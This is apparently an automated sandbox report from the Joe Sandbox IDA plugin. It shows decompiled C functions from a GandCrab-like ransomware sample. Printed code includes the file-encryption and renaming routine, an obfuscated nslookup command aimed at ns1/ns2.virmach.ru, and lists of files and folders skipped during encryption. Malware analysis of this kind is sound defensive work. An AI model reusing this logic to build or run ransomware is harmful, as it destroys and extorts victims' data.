String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: a655010c101f8cd6b3591c61a2dc586bac308539ce9f292449886e250b0f3cc4
Instruction ID: 6aa9529640d6402e3bea097fc2f940b0e09fe21a0863aecadebbde34f211185d
Opcode Fuzzy Hash: a655010c101f8cd6b3591c61a2dc586bac308539ce9f292449886e250b0f3cc4
Instruction Fuzzy Hash: B25136B0008341DFE320CF51D448B9AFFF9BF84759F004A1DEA988A252D7BA9558CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E37B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0F4E37B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F4E6500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf4f0530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf4f0530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf4f0530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F4E8400( &_v104, 0x10);
				E0F4E8400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F4E6660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F4E6660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F4E8520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F4E8B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F4E36D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0f4e37bb
0x0f4e37bd
0x0f4e37c1
0x0f4e37cf
0x0f4e37d8
0x0f4e37e3
0x0f4e37ef
0x0f4e37f1
0x0f4e380c
0x0f4e380e
0x0f4e3817
0x0f4e381a
0x0f4e3821
0x0f4e3828
0x0f4e3833
0x0f4e3839
0x0f4e3846
0x0f4e384e
0x0f4e384f
0x0f4e385a
0x0f4e385f
0x0f4e3863
0x0f4e386b
0x0f4e3870
0x0f4e3880
0x0f4e3896
0x0f4e3898
0x0f4e38ae
0x0f4e38b4
0x0f4e38b9
0x0f4e38bc
0x0f4e38c1
0x0f4e38c3
0x0f4e38c8
0x0f4e38d3
0x0f4e38d6
0x0f4e38da
0x0f4e38e1
0x0f4e38ef
0x0f4e38f4
0x0f4e38f9
0x0f4e3937
0x0f4e393c
0x0f4e3941
0x0f4e3970
0x0f4e3975
0x0f4e3993
0x0f4e3995
0x0f4e399b
0x0f4e39db
0x0f4e39e9
0x0f4e39ef
0x0f4e39f6
0x0f4e39f8
0x0f4e39fa
0x0f4e39fd
0x0f4e3a05
0x0f4e3a20
0x0f4e3a25
0x0f4e3a2b
0x0f4e3a37
0x0f4e3a3a
0x0f4e3a3d
0x0f4e3a3f
0x0f4e3a42
0x0f4e3a45
0x0f4e3a4a
0x0f4e3a50
0x0f4e3a50
0x0f4e3a51
0x0f4e3a55
0x0f4e3a55
0x0f4e3a6b
0x0f4e3a72
0x0f4e3a77
0x0f4e3a7a
0x0f4e3a7d
0x0f4e3a92
0x0f4e3aaa
0x0f4e3aaf
0x0f4e3ab2
0x0f4e3ab2
0x0f4e3abf
0x0f4e3ad2
0x0f4e3aed
0x0f4e3aef
0x0f4e3af4
0x0f4e3af4
0x0f4e3aff
0x0f4e3b05
0x0f4e3b0a
0x0f4e3a02
0x00000000
0x0f4e3a02
0x0f4e3b0a
0x00000000
0x0f4e3a25
0x0f4e3b20
0x0f4e3b26
0x0f4e3b37
0x0f4e3b4c
0x0f4e3b5c
0x0f4e3b5c
0x0f4e3b63
0x0f4e3b76
0x0f4e3b79
0x0f4e3b85
0x0f4e3b91
0x0f4e3b97
0x0f4e3b9f
0x0f4e3b9f
0x0f4e3ba5
0x0f4e399d
0x0f4e39ab
0x0f4e39b7
0x0f4e39b9
0x0f4e39bc
0x0f4e39c4
0x0f4e39c4
0x0f4e3943
0x0f4e3943
0x0f4e394f
0x0f4e3952
0x0f4e395a
0x0f4e395a
0x0f4e38fb
0x0f4e3908
0x0f4e3914
0x0f4e3917
0x0f4e391f
0x0f4e391f
0x0f4e3bb2
0x0f4e3bbe

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F4E37C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F4E37CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F4E380A
lstrcpyW.KERNEL32 ref: 0F4E3828
lstrcatW.KERNEL32(00000000,0043002E), ref: 0F4E3833

Part of subcall function 0F4E8400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,747166A0,00000000), ref: 0F4E8420
Part of subcall function 0F4E8400: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F4E8448
Part of subcall function 0F4E8400: GetModuleHandleA.KERNEL32(?), ref: 0F4E849D
Part of subcall function 0F4E8400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F4E84AB
Part of subcall function 0F4E8400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F4E84BA
Part of subcall function 0F4E8400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F4E84DE
Part of subcall function 0F4E8400: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E84EC

Part of subcall function 0F4E8400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F4E3875), ref: 0F4E8500
Part of subcall function 0F4E8400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F4E3875), ref: 0F4E850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F4E3896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F4E38C1

Part of subcall function 0F4E6660: EnterCriticalSection.KERNEL32(0F4F2A48,?,0F4E38F4,00000000,00000000,00000000,?,00000800), ref: 0F4E666B
Part of subcall function 0F4E6660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F4E38F4,00000000,00000000,00000000), ref: 0F4E6691
Part of subcall function 0F4E6660: GetLastError.KERNEL32(?,0F4E38F4,00000000,00000000,00000000), ref: 0F4E669B
Part of subcall function 0F4E6660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F4E38F4,00000000,00000000,00000000), ref: 0F4E66B7

MessageBoxA.USER32 ref: 0F4E3908
GetLastError.KERNEL32 ref: 0F4E3943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F4E3BB2

Strings

R, xrefs: 0F4E381A
B, xrefs: 0F4E3821
Fatal error, xrefs: 0F4E38FD
, xrefs: 0F4E38DA
., xrefs: 0F4E380E
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0F4E3902

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: d9c14d53996234a02c94ab1b382b8cf880fe0681f05c358fa25261d57ec327dd
Instruction ID: 176002f3f56c68064df6162780c75bce3d952d64aa9c09f6037281ca5ea4f6ec
Opcode Fuzzy Hash: d9c14d53996234a02c94ab1b382b8cf880fe0681f05c358fa25261d57ec327dd
Instruction Fuzzy Hash: 22C15E71E40309ABEB11DFA4DC45FEEBFB9BF48711F204115FA40BA282DBB469548B64

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E5060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xf4f2a70, 0xf4f2a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xf4f2a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf4f2a68, 0xf4f2a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xf4f2a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0F4E4E10(_t64);
								E0F4E4FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

0x0f4e506d
0x0f4e5078
0x0f4e507b
0x0f4e507f
0x0f4e5081
0x0f4e508b
0x0f4e5092
0x0f4e5095
0x0f4e509e
0x0f4e50af
0x0f4e50b6
0x0f4e50bd
0x0f4e50c4
0x0f4e50cb
0x0f4e50d2
0x0f4e50d9
0x0f4e50e0
0x0f4e50e7
0x0f4e50ee
0x0f4e50f5
0x0f4e50fc
0x0f4e5103
0x0f4e510a
0x0f4e5111
0x0f4e5118
0x0f4e511f
0x0f4e5126
0x0f4e512d
0x0f4e5134
0x0f4e513b
0x0f4e5142
0x0f4e5149
0x0f4e5150
0x0f4e5157
0x0f4e515e
0x0f4e5165
0x0f4e516d
0x0f4e5189
0x0f4e518d
0x00000000
0x0f4e518f
0x0f4e519f
0x0f4e51af
0x0f4e51b3
0x00000000
0x0f4e51b5
0x0f4e51c9
0x0f4e51cd
0x0f4e520a
0x0f4e5218
0x0f4e51cf
0x0f4e51d4
0x0f4e51df
0x0f4e51e8
0x0f4e51f5
0x0f4e5203
0x0f4e5203
0x0f4e51cd
0x0f4e51b3
0x0f4e516f
0x0f4e516f
0x0f4e5178
0x0f4e5178

APIs

CreatePipe.KERNEL32(0F4F2A70,0F4F2A6C,?,00000000,00000001,00000001,00000000), ref: 0F4E5165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F4E5189
CreatePipe.KERNEL32(0F4F2A68,0F4F2A74,0000000C,00000000), ref: 0F4E519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F4E51AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F4E51C3
wsprintfW.USER32 ref: 0F4E51D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E51F5

Strings

n, xrefs: 0F4E50C4
v, xrefs: 0F4E512D
l, xrefs: 0F4E508B
fabian wosar <3, xrefs: 0F4E5204
u, xrefs: 0F4E50AF
u, xrefs: 0F4E510A
l, xrefs: 0F4E50FC
o, xrefs: 0F4E5095
h, xrefs: 0F4E50E7
h, xrefs: 0F4E5142
r, xrefs: 0F4E50D9
, xrefs: 0F4E5111
, xrefs: 0F4E50B6
n, xrefs: 0F4E50F5
2, xrefs: 0F4E5126
r, xrefs: 0F4E5149
a, xrefs: 0F4E50E0
n, xrefs: 0F4E506D
r, xrefs: 0F4E50EE
r, xrefs: 0F4E5134
S, xrefs: 0F4E5118
1, xrefs: 0F4E50CB
S, xrefs: 0F4E50BD
a, xrefs: 0F4E513B
o, xrefs: 0F4E5103
v, xrefs: 0F4E50D2
n, xrefs: 0F4E511F

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 69949d9a4f2a90aaf5d55302a3bfd4b04845345b2bf74bd88448c6b96552c9f1
Instruction ID: 808888bf94cb55edf0d3db7171429d81a015af8c76d86f2cb90f7c31e8048046
Opcode Fuzzy Hash: 69949d9a4f2a90aaf5d55302a3bfd4b04845345b2bf74bd88448c6b96552c9f1
Instruction Fuzzy Hash: 1B414270E41308ABEB10CF95DC497EEBFB5FB04759F104119E904AB282D7FA46598F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E68F0 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F4E68F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0f4e68f9
0x0f4e68fc
0x0f4e6901
0x0f4e6903
0x0f4e6906
0x0f4e6909
0x0f4e690a
0x0f4e6910
0x0f4e6910
0x0f4e6913
0x0f4e6914
0x0f4e6910
0x0f4e6924
0x0f4e6931
0x0f4e6946
0x00000000
0x0f4e6990
0x0f4e6996
0x0f4e699b
0x0f4e69a0
0x0f4e69a0
0x0f4e6935
0x0f4e6935
0x0f4e693b
0x0f4e693b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F4E6B03), ref: 0F4E68FC
lstrlenW.KERNEL32(00000000), ref: 0F4E6901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F4E692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F4E6942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F4E694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F4E695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F4E6966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F4E6972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F4E697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F4E698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0F4E6996

Strings

iconcache.db, xrefs: 0F4E6954
bootsect.bak, xrefs: 0F4E6960
iqt, xrefs: 0F4E691E
autorun.inf, xrefs: 0F4E693C
desktop.ini, xrefs: 0F4E6927
ntuser.dat, xrefs: 0F4E6948
boot.ini, xrefs: 0F4E696C
CRAB-DECRYPT.txt, xrefs: 0F4E6990
thumbs.db, xrefs: 0F4E6984
ntuser.dat.log, xrefs: 0F4E6978

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: iqt$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3181620209
Opcode ID: 50b2c98390b5d4770e8224144b492cecebc691acaabba102614ce3ab587a1e51
Instruction ID: 3950db1ae89c21f676ac505cb99c6537d67c33b6612af148d1d62c97d40a6587
Opcode Fuzzy Hash: 50b2c98390b5d4770e8224144b492cecebc691acaabba102614ce3ab587a1e51
Instruction Fuzzy Hash: 7E11C262690726355B20767D9C01EFF128C8DF1EA3BA70227FD40E2153EBA5F60648B5

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0F4E6780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F4E81F0(_t52, L"\\ProgramData\\") != 0 || E0F4E81F0(_t52, L"\\IETldCache\\") != 0 || E0F4E81F0(_t52, L"\\Boot\\") != 0 || E0F4E81F0(_t52, L"\\Program Files\\") != 0 || E0F4E81F0(_t52, L"\\Tor Browser\\") != 0 || E0F4E81F0(_t52, L"Ransomware") != 0 || E0F4E81F0(_t52, L"\\All Users\\") != 0 || E0F4E81F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0F4E81F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0F4E81F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0F4E81F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0F4E81F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0F4E81F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

0x0f4e6791
0x0f4e67a0
0x0f4e67a9
0x0f4e68d4
0x0f4e68dd
0x0f4e68e8
0x0f4e683b
0x0f4e6842
0x0f4e6849
0x00000000
0x0f4e684f
0x0f4e684f
0x0f4e6855
0x0f4e6856
0x0f4e6858
0x0f4e6859
0x0f4e685e
0x0f4e686d
0x0f4e686f
0x0f4e6871
0x0f4e6872
0x0f4e6878
0x0f4e6887
0x0f4e6889
0x0f4e688b
0x0f4e688c
0x0f4e6892
0x0f4e68a1
0x0f4e68a3
0x0f4e68a5
0x0f4e68a6
0x0f4e68ac
0x0f4e68c8
0x0f4e68d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e685e
0x0f4e6849

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E6793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E6874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E68A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E68C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F4E6E06,00000000,?,?), ref: 0F4E68DD

Strings

\Local Settings\, xrefs: 0F4E6827
\Tor Browser\, xrefs: 0F4E67EB
\ProgramData\, xrefs: 0F4E6799
\Program Files\, xrefs: 0F4E67D7
\Windows\, xrefs: 0F4E683B
\IETldCache\, xrefs: 0F4E67AF
Ransomware, xrefs: 0F4E67FF
\Boot\, xrefs: 0F4E67C3
\All Users\, xrefs: 0F4E6813

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 03ad0e9584a362446747815b628f5cb5ee53024cbb590d05186dd34aa272b035
Instruction ID: 218a2096f1c2af44b5f5ba78b59f365d6c2fe0c383dc50d787c29805964de2eb
Opcode Fuzzy Hash: 03ad0e9584a362446747815b628f5cb5ee53024cbb590d05186dd34aa272b035
Instruction Fuzzy Hash: 3231292075176123EF2062670D15B6F888E9FE4A97F51402BAE01DE3C3FF58D90283AA

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F4E5220() {
